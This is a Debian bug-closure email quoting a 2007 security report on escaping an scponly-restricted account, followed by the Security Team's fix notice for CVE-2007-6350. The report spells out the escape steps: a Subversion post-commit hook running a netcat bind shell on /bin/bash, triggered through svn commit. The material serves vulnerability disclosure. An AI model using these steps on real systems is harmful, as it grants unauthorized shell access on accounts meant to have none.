Your message dated Mon, 28 Jan 2008 19:52:18 +0000 with message-id <[EMAIL PROTECTED]> and subject line Bug#437148: fixed in scponly 4.0-1sarge2 has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database)
--- Begin Message ---Package: scponly Version: 4.6-1 X-Debbugs-CC: [EMAIL PROTECTED] Severity: grave Tags: security Hi Thomas Wana, messing around with some friends here, I tried to access his computer with only a scponly protected account. I discovered this way of gaining full shell access: I locally created a subversion repository /tmp/blubb with a /tmp/blubb/hooks/post-commit that contains the command: ( nc -l -p 1042 -e /bin/bash) & I copy this repositry using scp -r /tmp/blubb/ [EMAIL PROTECTED]: Then I check out the repository remotely: ssh [EMAIL PROTECTED] /usr/bin/svn co file:///home/user/blubb bla Now I add a file and commit it: touch blah scp blah [EMAIL PROTECTED]:bla/ ssh [EMAIL PROTECTED] /usr/bin/svn ci bla At this point, I have a vim instance running, asking me for the commit message. I could now just run :!/bin/bash to get a shell, but having done the post-commit hook already, I want to use that, so I write something and quit the editor with :x At this point, I can use nc host 1042 and I have a shell for the account that should have none. The solution would be: Do not enable access to svn (or svnserve), which is a simple compilation option. I’d appreciate it if this gets fixed in debian etch. I have sent this information to [EMAIL PROTECTED] and scponly’s upstream maintainer last week, but have not yet gotten a response. Greetings, Joachim -- Joachim "nomeata" Breitner Debian Developer [EMAIL PROTECTED] | ICQ# 74513189 | GPG-Keyid: 4743206C JID: [EMAIL PROTECTED] | http://people.debian.org/~nomeata
signature.asc
Description: Dies ist ein digital signierter Nachrichtenteil
--- End Message ---
--- Begin Message ---Source: scponly Source-Version: 4.0-1sarge2 We believe that the bug you reported is fixed in the latest version of scponly, which is due to be installed in the Debian FTP archive: scponly_4.0-1sarge2.diff.gz to pool/main/s/scponly/scponly_4.0-1sarge2.diff.gz scponly_4.0-1sarge2.dsc to pool/main/s/scponly/scponly_4.0-1sarge2.dsc scponly_4.0-1sarge2_i386.deb to pool/main/s/scponly/scponly_4.0-1sarge2_i386.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Florian Weimer <[EMAIL PROTECTED]> (supplier of updated scponly package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Format: 1.7 Date: Tue, 25 Dec 2007 13:27:52 +0100 Source: scponly Binary: scponly Architecture: source i386 Version: 4.0-1sarge2 Distribution: oldstable-security Urgency: high Maintainer: Thomas Wana <[EMAIL PROTECTED]> Changed-By: Florian Weimer <[EMAIL PROTECTED]> Description: scponly - Restricts the commands available to scp- and sftp-users Closes: 437148 Changes: scponly (4.0-1sarge2) oldstable-security; urgency=high . * Non-maintainer upload by the Security Team * Remove rsync, Subversion and Unison support because it was possible to gain shell access through them (CVE-2007-6350). Closes: #437148. * scp: -o and -F options are dangerous (CVE-2007-6415). Files: f37d3236975bdb6742eba5ac788c40c2 892 utils optional scponly_4.0-1sarge2.dsc 380ea78eb602749989c8031a4f916c79 27490 utils optional scponly_4.0-1sarge2.diff.gz 62413a011d04721bb4b6f9a3d9496e27 29322 utils optional scponly_4.0-1sarge2_i386.deb -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iQEVAwUBR3EI5L97/wQC1SS+AQIcOgf6AzLvBGObNrYFKRLbZXuC3l5TPr2wiw03 mlwAbDAyvjsb84lsJz69H9u2wmmr0RWHr+JIepkKA5ewoH0on9SCskdjOVDd6cBV xMS3n0qnUIK7bXsZmxIyYg61neDHLalVlkShPu4+reYEbevE6CLU2p0n+L3esyLn fbDdWJae/29Pdt3G+xhZHyx0ruPmEkoQI3X96ar4qA7JGVJdQsl9gjLfJH4hY2Ii RrRzYaIaJVqJfN3eBw8bsVGW2NW9uMya97a9pzyE7Y5uqZO59SwxJl9jdRYGiCbP J4Y4brNlIyFx0bouwFL+Y4qNVP+aHX0N8hxaux99RRqvdbEHJY1OXw== =mZhF -----END PGP SIGNATURE-----
--- End Message ---
